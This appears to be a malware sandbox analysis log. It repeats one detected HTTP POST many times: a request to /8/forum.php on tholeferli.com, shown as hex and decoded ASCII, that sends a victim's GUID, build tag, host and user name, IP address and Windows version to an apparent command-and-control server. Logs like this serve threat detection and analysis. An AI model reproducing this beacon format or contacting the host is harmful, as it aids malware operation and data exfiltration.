                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
